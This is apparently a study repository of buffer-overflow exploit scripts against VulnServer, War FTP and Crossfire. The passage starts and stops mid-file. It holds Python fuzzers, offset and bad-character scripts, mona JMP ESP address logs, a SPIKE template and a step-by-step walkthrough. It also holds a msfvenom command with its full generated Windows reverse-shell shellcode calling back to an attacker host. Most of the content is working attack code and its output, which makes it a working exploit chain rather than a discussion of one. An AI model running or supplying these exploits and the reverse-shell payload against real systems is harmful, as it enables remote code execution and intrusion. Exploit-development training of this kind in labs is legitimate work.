"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 9 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." ) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('TRUN /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" 6 | 7 | 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',9999)) 11 | print("Sending pattern to Remote server" ) 12 | s.send(('TRUN /.:/'+ offset)) 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/spike.spk: -------------------------------------------------------------------------------- 1 | s_readline(); 2 | s_string("TRUN "); 3 | s_string_variable("0"); -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/BadChar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 4 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 5 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 6 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 7 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 8 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 9 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 10 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 11 | 12 | buffer = "A" * 485 + "B" * 4 + badchars 13 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 14 | connect=s.connect(('192.168.0.134',21)) 15 | response = s.recv(1024) 16 | print response 17 | s.send('USER ' + buffer + '\r\n') 18 | response = s.recv(1024) 19 | print response 20 | s.send('PASS PASSWORD\r\n') 21 | s.close() 22 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | buffer = "A" * 1100 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | connect=s.connect(('192.168.0.134',21)) 6 | response = s.recv(1024) 7 | print response 8 | s.send('USER ' + buffer + '\r\n') 9 | response = s.recv(1024) 10 | print response 11 | s.send('PASS PASSWORD\r\n') 12 | s.close() 13 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | buffer = "A" * 485 + "B" * 4 + "D" * (1100-len(buffer)) 5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | connect=s.connect(('192.168.0.134',21)) 7 | response = s.recv(1024) 8 | print response 9 | s.send('USER ' + buffer + '\r\n') 10 | response = s.recv(1024) 11 | print response 12 | s.send('PASS PASSWORD\r\n') 13 | s.close() 14 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | connect=s.connect(('192.168.0.134',21)) 7 | response = s.recv(1024) 8 | print response 9 | s.send('USER ' + buffer + '\r\n') 10 | response = s.recv(1024) 11 | print response 12 | s.send('PASS PASSWORD\r\n') 13 | s.close() 14 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Walkthough wartpo: -------------------------------------------------------------------------------- 1 | App : War FTP 2 | 3 | IP 192.168.0.134 4 | Port:21 5 | 6 | ________________________________________________ 7 | 1. Send Fuzzin and crash remote application at 1100 8 | 9 | 2. Send Paylaod and find EIP => 32714131 10 | 11 | 3. FInd Offset 485 12 | 13 | 4. Send EIP control paylaod buffer = "A" * 485 + "B" * 4 + "D" * (1100-len(buffer)) 14 | 15 | 5. Find Bad Char = > \x00, \X0A, and \ x0d 16 | 17 | 6. JMP ESP => !mona modules 18 | 7C9D30D7 19 | 20 | 7. Sending final payload -------------------------------------------------------------------------------- /BufferOverflow/crossfire/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | 6 | exploit=() 7 | 8 | 9 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect(('192.168.1.133',9999)) 14 | print("Sending pattern to Remote server....." ) 15 | s.send(('TRUN /.:/'+ Shellcode)) 16 | s.close() 17 | 18 | except: 19 | print("Error in connecting") 20 | sys.exit() 21 | -------------------------------------------------------------------------------- /BufferOverflow/crossfire/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 4377+"B" * 4 + badchars 14 | pre_buff="\x11(setup sound " 15 | 16 | post_buff = "x90\x00#" 17 | 18 | try: 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 20 | s.connect(('192.168.0.131',13327)) 21 | print ("Sending payload to remote server..........") 22 | s.send((pre_buff + Shellcode+ post_buff)) 23 | s.close() 24 | print("Payload send......") 25 | 26 | except: 27 | print("Error in connecting remote server........!") 28 | sys.exit() 29 | -------------------------------------------------------------------------------- /BufferOverflow/crossfire/eip.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 6 | offset='A'*4377 + 